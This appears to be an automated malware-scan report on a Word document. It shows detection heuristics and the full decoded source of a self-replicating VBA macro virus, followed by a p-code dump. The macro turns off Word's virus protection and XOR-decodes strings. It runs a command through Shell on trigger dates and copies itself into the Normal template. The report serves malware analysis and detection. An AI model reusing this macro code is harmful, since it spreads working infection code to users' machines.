MALICIOUS
300
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious OLE document containing a VBA macro with an AutoClose subroutine. This subroutine uses the Shell function to execute a payload, as indicated by multiple critical heuristic firings. The macro also contains obfuscated strings and attempts to disable virus protection, suggesting a downloader or dropper functionality.
Heuristics 6
-
ClamAV: Doc.Trojan.Encr-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Encr-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7460 bytes |
SHA-256: b7bd720580e4fa8942332fefc4f4dd5d65695d61c20972137e52c0f139e4dad4 |
|||
|
Detection
ClamAV:
Doc.Trojan.Encr-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Xute"
Const ID_VIR = "Alm|"
Const DIR_VIR = "Z#EALM\7]XM"
Const FX_VIR = "]\UMK\\96@9E373"
Const GREETS = "Rlmk|a9{`9Alm|"
Private Function encr(s, k As Integer)
Dim r
r = ""
For f = 1 To Len(s): r = r + Chr((Asc(Mid$(s, f, 1))) Xor k): Next
encr = r
End Function
Sub AutoClose()
Dim IsInDoc, IsInTem As Boolean
Dim InDoc, InTem As Integer
Dim iDay, iMon As Integer
Dim DatFx As String
On Error GoTo Done
IsInTem = False
IsInDoc = False
InDoc = 0
InTem = 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
DatFx = Date$
iDay = Val(Mid$(DatFx, 4, 2)): iMon = Val(Mid$(DatFx, 1, 2))
If (iMon = 7 And iDay = 26) Or (iDay + iMon) = 30 Then
DatFx = encr(FX_VIR, 25)
Shell DatFx, 0
MsgBox "wow" & encr(GREETS, 25)
End If
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = encr(ID_VIR, 25) Then
IsInDoc = True
InDoc = i
End If
Next
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = encr(ID_VIR, 25) Then
IsInTem = True
InTem = i
End If
Next
If Not IsInTem Then
ActiveDocument.VBProject.VBComponents(InDoc).Export encr(DIR_VIR, 25)
NormalTemplate.VBProject.VBComponents.Import encr(DIR_VIR, 25)
NormalTemplate.Save
End If
If Not IsInDoc And ActiveDocument.Saved = False Then
NormalTemplate.VBProject.VBComponents(InTem).Export encr(DIR_VIR, 25)
ActiveDocument.VBProject.VBComponents.Import encr(DIR_VIR, 25)
ActiveDocument.Save
End If
Kill encr(DIR_VIR, 25)
Done:
Application.ScreenUpdating = True
Application.DisplayAlerts = wdAlertsAll
End Sub
' Processing file: /opt/analyzer/scan_staging/76ff83551cfa41aeaf23966ae51b13fe.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Xute - 3916 bytes
' Line #0:
' Dim (Const)
' LitStr 0x0004 "Alm|"
' VarDefn ID_VIR
' Line #1:
' Dim (Const)
' LitStr 0x000B "Z#EALM\7]XM"
' VarDefn DIR_VIR
' Line #2:
' Dim (Const)
' LitStr 0x000F "]\UMK\\96@9E373"
' VarDefn FX_VIR
' Line #3:
' Dim (Const)
' LitStr 0x000E "Rlmk|a9{`9Alm|"
' VarDefn GREETS
' Line #4:
' Line #5:
' FuncDefn (Private Function encr(s, k As Integer))
' Line #6:
' Dim
' VarDefn r
' Line #7:
' LitStr 0x0000 ""
' St r
' Line #8:
' StartForVariable
' Ld False
' EndForVariable
' LitDI2 0x0001
' Ld s
' FnLen
' For
' BoS 0x0000
' Ld r
' Ld s
' Ld False
' LitDI2 0x0001
' ArgsLd Mid$$ 0x0003
' ArgsLd Asc 0x0001
' Paren
' Ld k
' Xor
' ArgsLd Chr 0x0001
' Add
' St r
' BoS 0x0000
' StartForVariable
' Next
' Line #9:
' Ld r
' St encr
' Line #10:
' EndFunc
' Line #11:
' Line #12:
' FuncDefn (Sub AutoClose())
' Line #13:
' Dim
' VarDefn IsInDoc
' VarDefn IsInTem (As Boolean)
' Line #14:
' Dim
' VarDefn InDoc
' VarDefn InTem (As Integer)
' Line #15:
' Dim
' VarDefn iDay
' VarDefn iMon (As Integer)
' Line #16:
' Dim
' VarDefn DatFx (As String)
' Line #17:
' OnError Done
' Line #18:
' LitVarSpecial (False)
' St IsInTem
' Line #19:
' LitVarSpecial (False)
' St IsInDoc
' Line #20:
' LitDI2 0x0000
' St InDoc
' Line #21:
' LitDI2 0x0000
' St InTem
' Line #22:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #23:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #24:
' LitVa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.